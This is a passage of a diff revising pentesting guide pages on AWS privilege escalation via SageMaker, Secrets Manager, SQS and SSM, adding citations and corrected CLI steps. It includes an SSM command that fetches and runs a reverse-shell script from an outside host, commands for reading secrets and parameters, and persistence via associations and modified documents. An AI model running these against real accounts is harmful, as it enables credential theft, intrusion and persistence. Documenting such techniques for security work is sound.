+> This attack requires that there are no applications in the domain or the app creation will fail with the error: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.`<sup>[[21]](#references)[[19]](#references)[[20]](#references)</sup>
 
 Steps:
 
 ```bash
 # 1) List Studio domains and pick a target
-aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' 
+aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}'
 
-# 2) List Studio user profiles and pick a target
+# 2) List existing profiles, then choose a new name (the domain default applies to profiles created after the update)
 aws sagemaker list-user-profiles --domain-id-equals <DOMAIN_ID>
+USER=<NEW_USER_PROFILE_NAME>
 
 # Choose a more-privileged role that already trusts sagemaker.amazonaws.com
 ROLE_ARN=arn:aws:iam::<ACCOUNT_ID>:role/<HighPrivSageMakerExecutionRole>
 
-# 3) Change the domain default so every profile inherits the new role
+# 3) Optional if existing apps block UpdateDomain; list and delete every blocking app first
+aws sagemaker list-apps \
+  --domain-id-equals <DOMAIN_ID>
+
+# Delete each blocking app (repeat as needed)
+aws sagemaker delete-app \
+  --domain-id <DOMAIN_ID> \
+  --user-profile-name <EXISTING_USER> \
+  --app-type JupyterServer \
+  --app-name <APP_NAME>
+
+# 4) Change the domain default so profiles without an explicit role inherit the new role
 aws sagemaker update-domain \
   --domain-id <DOMAIN_ID> \
   --default-user-settings ExecutionRole=$ROLE_ARN
@@ -383,40 +397,34 @@ aws sagemaker describe-domain \
   --domain-id <DOMAIN_ID> \
   --query 'DefaultUserSettings.ExecutionRole' --output text
 
-# 3.1) Optional if you need to delete existing apps first
-# List existing apps
-aws sagemaker list-apps \
-  --domain-id-equals <DOMAIN_ID> 
-
-# Delete an app
-aws sagemaker delete-app \
+# 5) Create the new user profile without an explicit role override
+aws sagemaker create-user-profile \
   --domain-id <DOMAIN_ID> \
-  --user-profile-name <USER> \
-  --app-type JupyterServer \
-  --app-name <APP_NAME>
+  --user-profile-name $USER
 
-# 4) Create a JupyterServer app for a user profile (will inherit domain default role)
+# 6) Create a JupyterServer app for the new profile (it inherits the domain default)
 aws sagemaker create-app \
   --domain-id <DOMAIN_ID> \
+  --user-profile-name $USER \
   --app-type JupyterServer \
   --app-name js-domain-escalated
 
-# 5) Generate a presigned URL to access Studio with the new domain default role
+# 7) Generate a presigned URL to access Studio with the new domain default role
 aws sagemaker create-presigned-domain-url \
   --domain-id <DOMAIN_ID> \
-  --user-profile-name <USER> \
+  --user-profile-name $USER \
   --query AuthorizedUrl --output text
 
-# 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify:
+# 8) Open the URL in browser, navigate to JupyterLab, open Terminal and verify:
 #    aws sts get-caller-identity
 #    (should show the high-privilege role from domain defaults)
 ```
 
-**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.
+**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[19]](#references)[[21]](#references)[[8]](#references)</sup>
 
 ### `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`
 
-An attacker with permission to create a SageMaker Studio app for a target UserProfile can launch a JupyterServer app that runs with the profile's `ExecutionRole`. This provides interactive access to the role's permissions via Jupyter terminals or jobs launched from Studio.
+An attacker with permission to create a SageMaker Studio app for a target UserProfile can launch a JupyterServer app that runs with the profile's `ExecutionRole`. This provides interactive access to the role's permissions via Jupyter terminals or jobs launched from Studio.<sup>[[19]](#references)[[5]](#references)[[8]](#references)</sup>
 
 Steps:
 
@@ -444,12 +452,12 @@ aws sagemaker create-presigned-domain-url \
 #    aws sts get-caller-identity
 ```
 
-**Potential Impact**: Interactive access to the SageMaker execution role attached to the target UserProfile.
+**Potential Impact**: Interactive access to the SageMaker execution role attached to the target UserProfile.<sup>[[5]](#references)[[19]](#references)[[8]](#references)</sup>
 
 
-### `iam:GetUser`, `datazone:CreateUserProfile`
+### `datazone:CreateUserProfile` (and `iam:GetUser` for project assignment without an existing profile)
 
-An attacker with those permissions can give user access to an IAM user into a Sagemaker Unified Studio Domain by creating a DataZone User Profile for that user.
+An attacker with `datazone:CreateUserProfile` can create a DataZone user profile for an IAM user. Access to projects and their resources still depends on domain assignment and project membership; `iam:GetUser` is a permission needed by the domain execution role when adding an IAM principal that does not yet have a profile, rather than a prerequisite for the direct `CreateUserProfile` call.<sup>[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 # List domains
@@ -465,13 +473,38 @@ aws datazone create-user-profile \
   --user-type IAM_USER
 ```
 
-The Unified Domain URL has the following format: `https://<domain-id>.sagemaker.<region>.on.aws/` (e.g. `https://dzd-cmixuznq0h8cmf.sagemaker.us-east-1.on.aws/`).
+The Unified Domain URL has the following format: `https://<domain-id>.sagemaker.<region>.on.aws/` (e.g. `https://dzd-cmixuznq0h8cmf.sagemaker.us-east-1.on.aws/`).<sup>[[23]](#references)[[26]](#references)</sup>
 
-**Potential Impact:** Access to the Sagemaker Unified Studio Domain as a user being able to access all the resources inside the Sagemaker domain and even escalate privieleges to the role that the notebooks inside the Sagemaker Unified Studio Domain are using.
+**Potential Impact:** The IAM user receives a Unified Studio profile and, if granted membership in a project, can use that project's tools and resources under the project's configured execution role; a profile alone does not grant access to every resource in the domain.<sup>[[23]](#references)[[24]](#references)[[25]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
-
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation – Part 2](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
+- [2] [CreateNotebookInstance - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateNotebookInstance.html)
+- [3] [CreatePresignedNotebookInstanceUrl - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreatePresignedNotebookInstanceUrl.html)
+- [4] [ListNotebookInstances - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_ListNotebookInstances.html)
+- [5] [CreatePresignedDomainUrl - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreatePresignedDomainUrl.html)
+- [6] [Actions, resources, and condition keys for Amazon SageMaker](https://docs.aws.amazon.com/service-authorization/latest/reference/list_sagemaker.html)
+- [7] [Domain user profiles - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/domain-user-profile.html)
+- [8] [Understanding domain space permissions and execution roles - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/execution-roles-and-spaces.html)
+- [9] [CreatePresignedMlflowTrackingServerUrl - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreatePresignedMlflowTrackingServerUrl.html)
+- [10] [Set up IAM permissions for MLflow - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/mlflow-create-tracking-server-iam.html)
+- [11] [ListMlflowTrackingServers - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_ListMlflowTrackingServers.html)
+- [12] [Launch the MLflow UI using a presigned URL - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/mlflow-launch-ui.html)
+- [13] [CreateProcessingJob - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateProcessingJob.html)
+- [14] [How Amazon SageMaker Processing Runs Your Processing Container Image - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/byoc-run-image.html)
+- [15] [Container credential provider - AWS SDKs and Tools](https://docs.aws.amazon.com/sdkref/latest/guide/feature-container-credentials.html)
+- [16] [CreateTrainingJob - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateTrainingJob.html)
+- [17] [CreateHyperParameterTuningJob - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateHyperParameterTuningJob.html)
+- [18] [SageMaker Training and Inference Toolkits - Amazon SageMaker AI](https://docs.aws.amazon.com/sagemaker/latest/dg/amazon-sagemaker-toolkits.html)
+- [19] [CreateApp - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateApp.html)
+- [20] [DeleteApp - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_DeleteApp.html)
+- [21] [UpdateDomain - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_UpdateDomain.html)
+- [22] [CreateUserProfile - Amazon DataZone](https://docs.aws.amazon.com/datazone/latest/APIReference/API_CreateUserProfile.html)
+- [23] [Managing users in Amazon SageMaker Unified Studio](https://docs.aws.amazon.com/sagemaker-unified-studio/latest/adminguide/user-management.html)
+- [24] [Add members to a project - Amazon DataZone](https://docs.aws.amazon.com/datazone/latest/userguide/add-members-to-project.html)
+- [25] [IAM-based domains and projects - Amazon SageMaker Unified Studio](https://docs.aws.amazon.com/sagemaker-unified-studio/latest/adminguide/iam-based-domains.html)
+- [26] [Network isolation in Amazon SageMaker Unified Studio](https://docs.aws.amazon.com/sagemaker-unified-studio/latest/adminguide/network-isolation.html)
+- [27] [CreateUserProfile - Amazon SageMaker](https://docs.aws.amazon.com/sagemaker/latest/APIReference/API_CreateUserProfile.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Secrets Manager Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Secrets Manager
 
 For more info about secrets manager check:
@@ -12,20 +10,24 @@ For more info about secrets manager check:
 
 ### `secretsmanager:GetSecretValue`
 
-An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
+An attacker with this permission can retrieve the decrypted `SecretString` or `SecretBinary` value stored in an AWS Secrets Manager secret.<sup>[[1]](#references)</sup>
 
 ```bash
 aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
 ```
 
-**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+**Potential Impact:** Access to sensitive data stored in AWS Secrets Manager.<sup>[[1]](#references)</sup>
 
 > [!WARNING]
-> Note that even with the `secretsmanager:BatchGetSecretValue` permission an atatcker would also need `secretsmanager:GetSecretValue` to retrieve the sensitive secrets.
+> `secretsmanager:BatchGetSecretValue` is not sufficient by itself: an attacker also needs `secretsmanager:GetSecretValue` for each secret (and `secretsmanager:ListSecrets` when using filters).<sup>[[2]](#references)</sup>
 
 ### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)
 
-With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../../aws-services/aws-kms-enum.md)).
+With `secretsmanager:PutResourcePolicy`, a principal can attach a resource-based policy to a secret, potentially granting `secretsmanager:GetSecretValue` to another principal or account; `secretsmanager:GetResourcePolicy` reads the existing policy, and `secretsmanager:ListSecrets` enumerates secret metadata.<sup>[[3]](#references)[[4]](#references)</sup>
+
+For cross-account access, both the secret's resource policy and the caller's identity policy must allow the action. A secret encrypted with a customer-managed KMS key also requires `kms:Decrypt` (more info in the [KMS Enum page](../../aws-services/aws-kms-enum.md)); across accounts, use a customer-managed key with an appropriate key policy because the AWS managed `aws/secretsmanager` key cannot be used.<sup>[[1]](#references)[[5]](#references)</sup>
+
+Use these AWS CLI commands to enumerate secrets, inspect the resource policy, and attach a new resource policy.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 aws secretsmanager list-secrets
@@ -51,7 +53,12 @@ policy.json:
 }
 ```
 
+## References
+
+- [1] [get-secret-value — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-secret-value.html)
+- [2] [BatchGetSecretValue - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_BatchGetSecretValue.html)
+- [3] [list-secrets — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/list-secrets.html)
+- [4] [Resource-based policies - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/userguide/auth-and-access_resource-policies.html)
+- [5] [Access AWS Secrets Manager secrets from a different account - AWS Secrets Manager](https://docs.aws.amazon.com/secretsmanager/latest/userguide/auth-and-access_examples_cross.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - SQS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SQS
 
 For more information check:
@@ -12,15 +10,17 @@ For more information check:
 
 ### `sqs:AddPermission`
 
-An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
+An attacker with `sqs:AddPermission` over a queue can add a permission for an AWS account. The API generates a queue policy and does not support non-account principals, so a successful abuse can expose messages or permit the granted account to manipulate the queue.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 aws sqs add-permission --queue-url <value> --actions <value> --aws-account-ids <value> --label <value>
 ```
 
-**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by the granted account.
 
-### `sqs:SendMessage` , `sqs:SendMessageBatch`
+### `sqs:SendMessage`
+
+The `sqs:SendMessage` IAM permission authorizes both `SendMessage` and `SendMessageBatch`; there is no separate `sqs:SendMessageBatch` IAM action. These APIs deliver one or more messages to the specified queue.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
 
@@ -33,6 +33,8 @@ aws sqs send-message-batch --queue-url <value> --entries <value>
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
+AWS defines these permissions to retrieve messages, delete specified messages, and change a message's visibility timeout, respectively.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup> `ReceiveMessage` returns a receipt handle, which is required by the delete and visibility-timeout operations.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+
 An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
 
 ```bash
@@ -43,8 +45,15 @@ aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> -
 
 **Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
 
+## References
+
+- [1] [Amazon SQS API permissions: Actions and resource reference](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-api-permissions-reference.html)
+- [2] [add-permission — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/add-permission.html)
+- [3] [send-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html)
+- [4] [send-message-batch — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message-batch.html)
+- [5] [receive-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html)
+- [6] [delete-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/delete-message.html)
+- [7] [ChangeMessageVisibility — Amazon Simple Queue Service API Reference](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_ChangeMessageVisibility.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - SSM Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SSM
 
 For more info about SSM check:
@@ -12,7 +10,9 @@ For more info about SSM check:
 
 ### `ssm:SendCommand`
 
-An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
+An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[34]](#references)[[35]](#references)</sup>
+
+The discovery calls below are optional and require their respective read permissions; if they are unavailable, use a known managed-node ID with `send-command`.<sup>[[1]](#references)[[34]](#references)[[35]](#references)</sup>
 
 ```bash
 # Check for configured instances
@@ -35,11 +35,13 @@ aws ssm send-command --instance-ids "$INSTANCE_ID" \
    --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
 ```
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### `ssm:StartSession`
 
-An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
+An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[34]](#references)[[35]](#references)</sup>
+
+The discovery calls below are optional and require their respective read permissions; if they are unavailable, use a known managed-node ID with `start-session`.<sup>[[1]](#references)[[34]](#references)[[35]](#references)</sup>
 
 ```bash
 # Check for configured instances
@@ -51,15 +53,15 @@ aws ssm start-session --target "$INSTANCE_ID"
 ```
 
 > [!CAUTION]
-> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)
+> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)<sup>[[8]](#references)[[9]](#references)</sup>
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.<sup>[[4]](#references)[[5]](#references)</sup>
 
 #### Privesc to ECS
 
-When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\
-According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\
-Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running:
+When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.<sup>[[10]](#references)[[11]](#references)</sup>\
+According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)<sup>[[8]](#references)[[10]](#references)[[11]](#references)</sup>\
+Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running:<sup>[[1]](#references)[[6]](#references)[[10]](#references)</sup>
 
 ```bash
 aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
@@ -67,11 +69,13 @@ aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
 
 ![Terminal running aws ssm start-session against an ECS target and receiving a root shell](<../../../images/image (185).png>)
 
-**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled.
+**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ### `ssm:ResumeSession`
 
-An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it.
+An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[12]](#references)[[13]](#references)[[35]](#references)</sup>
+
+The `describe-sessions` lookup is optional and requires `ssm:DescribeSessions`; a known disconnected session ID can be supplied directly to `resume-session`.<sup>[[1]](#references)[[35]](#references)</sup>
 
 ```bash
 # Check for configured instances
@@ -82,11 +86,11 @@ aws ssm resume-session \
     --session-id Mary-Major-07a16060613c408b5
 ```
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.<sup>[[4]](#references)[[5]](#references)[[12]](#references)</sup>
 
 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
 
-An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys.
+An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. SecureString values require the `--with-decryption` option and the permissions needed to decrypt them. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys.<sup>[[1]](#references)[[14]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ```bash
 aws ssm describe-parameters
@@ -95,21 +99,21 @@ aws ssm get-parameters --names id_rsa --with-decryption
 aws ssm get-parameter --name id_rsa --with-decryption
 ```
 
-**Potential Impact:** Find sensitive information inside the parameters.
+**Potential Impact:** Find sensitive information inside the parameters.<sup>[[14]](#references)[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 ### `ssm:ListCommands`
 
-An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them.
+An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them.<sup>[[1]](#references)[[18]](#references)</sup>
 
 ```
 aws ssm list-commands
 ```
 
-**Potential Impact:** Find sensitive information inside the command lines.
+**Potential Impact:** Find sensitive information inside the command lines.<sup>[[18]](#references)</sup>
 
 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)
 
-An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it.
+An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it.<sup>[[1]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 # You can use any of both options to get the command-id and instance id
@@ -119,11 +123,11 @@ aws ssm list-command-invocations
 aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
 ```
 
-**Potential Impact:** Find sensitive information inside the output of the command lines.
+**Potential Impact:** Find sensitive information inside the output of the command lines.<sup>[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ### Using ssm:CreateAssociation
 
-An attacker with the permission **`ssm:CreateAssociation`** can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at a fixed interval, making them suitable for backdoor-like persistence without interactive sessions.
+An attacker with the permission **`ssm:CreateAssociation`** can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at a fixed interval, making them suitable for backdoor-like persistence without interactive sessions.<sup>[[1]](#references)[[5]](#references)[[21]](#references)[[22]](#references)</sup>
 
 
 ```bash
@@ -136,25 +140,27 @@ aws ssm create-association \
 ```
 
 > [!NOTE]
-> This persistence method works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not require interactive sessions or explicit ssm:SendCommand permissions. **Important:** The `--schedule-expression` parameter (e.g., `rate(30 minutes)`) must respect AWS's minimum interval of 30 minutes. For immediate or one-time execution, omit `--schedule-expression` entirely — the association will execute once after creation.
+> This persistence method works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not require interactive sessions or explicit ssm:SendCommand permissions. **Important:** The `--schedule-expression` parameter (e.g., `rate(30 minutes)`) must respect AWS's minimum interval of 30 minutes. For immediate or one-time execution, omit `--schedule-expression` entirely — the association will execute once after creation.<sup>[[1]](#references)[[5]](#references)[[21]](#references)[[22]](#references)</sup>
 
 ### `ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)
 
-An attacker with the permissions **`ssm:UpdateDocument`** and **`ssm:UpdateDocumentDefaultVersion`** can escalate privileges by modifying existing documents. This also allows for persistence within that document. Practically the attacker would also need **`ssm:ListDocuments`** to get the names for custom documents and if the attacker wants to obfuscate their payload within an existing document **`ssm:GetDocument`** would be necessary as well.
+An attacker with the permissions **`ssm:UpdateDocument`** and **`ssm:UpdateDocumentDefaultVersion`** can escalate privileges by modifying existing documents. This also allows for persistence within that document. Practically, the attacker can use **`ssm:ListDocuments`** to discover custom document names and **`ssm:GetDocument`** to inspect an existing document before modifying it.<sup>[[1]](#references)[[23]](#references)[[24]](#references)[[25]](#references)[[26]](#references)</sup>
 
 ```bash
 aws ssm list-documents
 aws ssm get-document --name "target-document" --document-format YAML
-# You will need to specify the version you're updating
-aws ssm update-document \
+# Update the latest version and capture the new version number
+latest_version=$(aws ssm update-document \
   --name "target-document" \
   --document-format YAML \
   --content "file://doc.yaml" \
-  --document-version 1
-aws ssm update-document-default-version --name "target-document" --document-version 2
+  --document-version '$LATEST' \
+  --query 'DocumentDescription.LatestVersion' \
+  --output text)
+aws ssm update-document-default-version --name "target-document" --document-version "$latest_version"
 ```
 
-Below is an example document that can be used to overwrite and existing document. You will want to ensure your document type matches the target documents type to issues with innvocation. The document below for instance will the **`ssm:SendCommand`** and **`ssm:CreateAssociation`** examples.
+Below is an example document that can be used to overwrite an existing document. Ensure that its document type and platform match the target to avoid invocation issues. The document below can be used with both the **`ssm:SendCommand`** and **`ssm:CreateAssociation`** examples.<sup>[[2]](#references)[[3]](#references)[[21]](#references)[[23]](#references)[[27]](#references)[[28]](#references)</sup>
 
 ```yaml
 schemaVersion: '2.2'
@@ -163,22 +169,24 @@ parameters:
   commands:
     type: StringList
     description: "The commands to run."
+    default:
+      - "id > /tmp/pwn_test.txt"
     displayType: textarea
 mainSteps:
   - action: aws:runShellScript
     name: runCommands
     inputs:
-      runCommand: 
-        - "id > /tmp/pwn_test.txt"
+      runCommand:
+        - "{{ commands }}"
 ```
 
 ### `ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)
 
-An attacker with the permissions **`ssm:RegisterTaskWithMaintenanceWindow`** and **`ssm:RegisterTargetWithMaintenanceWindow`** can escalate privileges by first registering a new target with an existing maintenance window and then updating registering a new task. This achieves execution on the existing targets, but can allow an attacker to compromise compute with different roles by register new targets. This also allows for persistence as maintenance windows tasks are executed on a pre-defined interval during the window creation. Practically the attacker would also need **`ssm:DescribeMaintenanceWindows`** to get the maintenance window IDs.
+An attacker with the permissions **`ssm:RegisterTaskWithMaintenanceWindow`** and **`ssm:RegisterTargetWithMaintenanceWindow`** can escalate privileges by first registering a new target with an existing maintenance window and then registering a new task. This achieves execution on the existing targets, but can allow an attacker to compromise compute with different roles by registering new targets. This also allows for persistence because maintenance-window tasks are executed on the predefined schedule. Practically, the attacker would also need **`ssm:DescribeMaintenanceWindows`** to get the maintenance window IDs and may use **`ec2:DescribeInstances`** to discover instance IDs.<sup>[[1]](#references)[[29]](#references)[[30]](#references)[[31]](#references)[[32]](#references)[[33]](#references)</sup>
 
 ``` bash
 aws ec2 describe-instances
-aws ssm describe-maintenance-window
+aws ssm describe-maintenance-windows
 aws ssm register-target-with-maintenance-window \
   --window-id "<mw-id>" \
   --resource-type "INSTANCE" \
@@ -201,6 +209,42 @@ You can also use SSM to get inside a codebuild project being built:
 ../aws-codebuild-privesc/README.md
 {{#endref}}
 
+## References
+
+- [1] [Actions, resources, and condition keys for AWS Systems Manager](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ssm.html)
+- [2] [AWS Systems Manager Run Command](https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html)
+- [3] [SendCommand - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_SendCommand.html)
+- [4] [IAM roles for Amazon EC2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html)
+- [5] [Working with SSM Agent - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-agent.html)
+- [6] [AWS Systems Manager Session Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager.html)
+- [7] [StartSession - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_StartSession.html)
